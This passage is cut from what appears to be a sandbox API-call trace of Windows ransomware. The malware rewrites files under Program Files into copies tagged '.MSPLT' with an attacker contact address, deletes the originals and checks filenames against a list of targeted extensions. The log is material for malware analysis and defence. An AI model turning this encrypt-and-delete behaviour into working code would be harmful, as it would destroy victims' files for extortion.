dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.855] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=168) returned 1 [0174.855] CloseHandle (hObject=0x350) returned 1 [0174.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 0x20 [0174.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.855] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.855] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.855] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.855] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.856] GetLastError () returned 0x0 [0174.856] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xa8, lpOverlapped=0x0) returned 1 [0174.857] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xb0, lpOverlapped=0x0) returned 1 [0174.859] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0174.859] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x102, lpOverlapped=0x0) returned 1 [0174.859] SetEndOfFile (hFile=0x2e8) returned 1 [0174.859] CloseHandle (hObject=0x2e8) returned 1 [0174.864] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.864] SetEndOfFile (hFile=0x350) returned 1 [0174.865] CloseHandle (hObject=0x350) returned 1 [0174.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.866] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 1 [0174.866] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.866] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.866] lstrlenW (lpString=".doc") returned 4 [0174.866] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.866] lstrlenW (lpString=".docx") returned 5 [0174.866] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.867] lstrlenW (lpString=".pdf") returned 4 [0174.867] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.867] lstrlenW (lpString=".xls") returned 4 [0174.867] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.867] lstrlenW (lpString=".xlsx") returned 5 [0174.867] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.867] lstrlenW (lpString=".ppt") returned 4 [0174.867] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.867] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.867] lstrlenW (lpString=".zip") returned 4 [0174.867] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.867] lstrlenW (lpString=".rar") returned 4 [0174.867] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.867] lstrlenW (lpString=".bz2") returned 4 [0174.867] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.867] lstrlenW (lpString=".7z") returned 3 [0174.867] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.867] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.867] lstrlenW (lpString=".dbf") returned 4 [0174.867] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.867] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.867] lstrlenW (lpString=".1cd") returned 4 [0174.867] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.867] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.868] lstrlenW (lpString=".jpg") returned 4 [0174.868] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.868] lstrlenW (lpString=".doc") returned 4 [0174.868] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.868] lstrlenW (lpString=".docx") returned 5 [0174.868] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.868] lstrlenW (lpString=".pdf") returned 4 [0174.868] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString=".xls") returned 4 [0174.868] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString=".xlsx") returned 5 [0174.868] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.868] lstrlenW (lpString=".ppt") returned 4 [0174.868] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.868] lstrlenW (lpString=".zip") returned 4 [0174.868] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString=".rar") returned 4 [0174.868] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.868] lstrlenW (lpString=".bz2") returned 4 [0174.868] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.868] lstrlenW (lpString=".7z") returned 3 [0174.868] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.869] lstrlenW (lpString=".dbf") returned 4 [0174.869] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.869] lstrlenW (lpString=".1cd") returned 4 [0174.869] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0174.869] lstrlenW (lpString=".jpg") returned 4 [0174.869] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.869] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.869] lstrlenW (lpString="win32_LinkNoDrop32x32.gif") returned 25 [0174.869] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.869] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=153) returned 1 [0174.870] CloseHandle (hObject=0x350) returned 1 [0174.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 0x20 [0174.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0174.870] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.870] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0174.870] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0174.871] GetLastError () returned 0x0 [0174.871] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x99, lpOverlapped=0x0) returned 1 [0175.374] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xa0, lpOverlapped=0x0) returned 1 [0175.376] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0175.376] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x106, lpOverlapped=0x0) returned 1 [0175.376] SetEndOfFile (hFile=0x2e8) returned 1 [0175.376] CloseHandle (hObject=0x2e8) returned 1 [0175.380] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.380] SetEndOfFile (hFile=0x350) returned 1 [0175.381] CloseHandle (hObject=0x350) returned 1 [0175.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0175.381] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif")) returned 1 [0175.382] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.382] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.382] lstrlenW (lpString=".doc") returned 4 [0175.382] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0175.382] lstrlenW (lpString=".docx") returned 5 [0175.382] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0175.382] lstrlenW (lpString=".pdf") returned 4 [0175.382] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0175.382] lstrlenW (lpString=".xls") returned 4 [0175.382] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0175.382] lstrlenW (lpString=".xlsx") returned 5 [0175.382] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0175.382] lstrlenW (lpString=".ppt") returned 4 [0175.382] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0175.382] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.382] lstrlenW (lpString=".zip") returned 4 [0175.382] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0175.382] lstrlenW (lpString=".rar") returned 4 [0175.382] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0175.382] lstrlenW (lpString=".bz2") returned 4 [0175.382] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0175.382] lstrlenW (lpString=".7z") returned 3 [0175.383] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString=".dbf") returned 4 [0175.383] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString=".1cd") returned 4 [0175.383] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString=".jpg") returned 4 [0175.383] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString=".doc") returned 4 [0175.383] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0175.383] lstrlenW (lpString=".docx") returned 5 [0175.383] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0175.383] lstrlenW (lpString=".pdf") returned 4 [0175.383] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString=".xls") returned 4 [0175.383] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString=".xlsx") returned 5 [0175.383] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0175.383] lstrlenW (lpString=".ppt") returned 4 [0175.383] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.383] lstrlenW (lpString=".zip") returned 4 [0175.383] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString=".rar") returned 4 [0175.383] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0175.383] lstrlenW (lpString=".bz2") returned 4 [0175.384] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0175.384] lstrlenW (lpString=".7z") returned 3 [0175.384] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0175.384] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.384] lstrlenW (lpString=".dbf") returned 4 [0175.384] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0175.384] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.384] lstrlenW (lpString=".1cd") returned 4 [0175.384] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0175.384] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 79 [0175.384] lstrlenW (lpString=".jpg") returned 4 [0175.384] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0175.384] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0175.384] lstrlenW (lpString="FileSystemMetadata.xml") returned 22 [0175.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0175.385] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=281) returned 1 [0175.385] CloseHandle (hObject=0x350) returned 1 [0175.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 0x220 [0175.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0175.385] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.386] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0175.386] GetLastError () returned 0x0 [0175.386] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x119, lpOverlapped=0x0) returned 1 [0175.387] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x120, lpOverlapped=0x0) returned 1 [0175.388] ReadFile (in: hFile=0x350, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0175.388] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x100, lpOverlapped=0x0) returned 1 [0175.389] SetEndOfFile (hFile=0x2e8) returned 1 [0175.389] CloseHandle (hObject=0x2e8) returned 1 [0175.399] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0175.399] SetEndOfFile (hFile=0x350) returned 1 [0175.400] CloseHandle (hObject=0x350) returned 1 [0175.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0175.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 1 [0175.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".doc") returned 4 [0175.401] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString=".docx") returned 5 [0175.401] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0175.401] lstrlenW (lpString=".pdf") returned 4 [0175.401] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString=".xls") returned 4 [0175.401] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString=".xlsx") returned 5 [0175.401] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0175.401] lstrlenW (lpString=".ppt") returned 4 [0175.401] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".zip") returned 4 [0175.401] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0175.401] lstrlenW (lpString=".rar") returned 4 [0175.401] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString=".bz2") returned 4 [0175.401] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString=".7z") returned 3 [0175.401] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".dbf") returned 4 [0175.401] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".1cd") returned 4 [0175.401] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".jpg") returned 4 [0175.401] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.401] lstrlenW (lpString=".doc") returned 4 [0175.402] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString=".docx") returned 5 [0175.402] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0175.402] lstrlenW (lpString=".pdf") returned 4 [0175.402] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString=".xls") returned 4 [0175.402] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString=".xlsx") returned 5 [0175.402] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0175.402] lstrlenW (lpString=".ppt") returned 4 [0175.402] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.402] lstrlenW (lpString=".zip") returned 4 [0175.402] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0175.402] lstrlenW (lpString=".rar") returned 4 [0175.402] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString=".bz2") returned 4 [0175.402] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString=".7z") returned 3 [0175.402] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0175.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.402] lstrlenW (lpString=".dbf") returned 4 [0175.402] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.402] lstrlenW (lpString=".1cd") returned 4 [0175.402] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0175.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0175.402] lstrlenW (lpString=".jpg") returned 4 [0175.402] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0175.403] lstrcmpiW (lpString1=".HTM", lpString2=".MSPLT") returned -1 [0175.403] lstrlenW (lpString="OSPP.HTM") returned 8 [0175.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0175.404] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=174528) returned 1 [0175.404] CloseHandle (hObject=0x350) returned 1 [0175.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 0x20 [0175.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 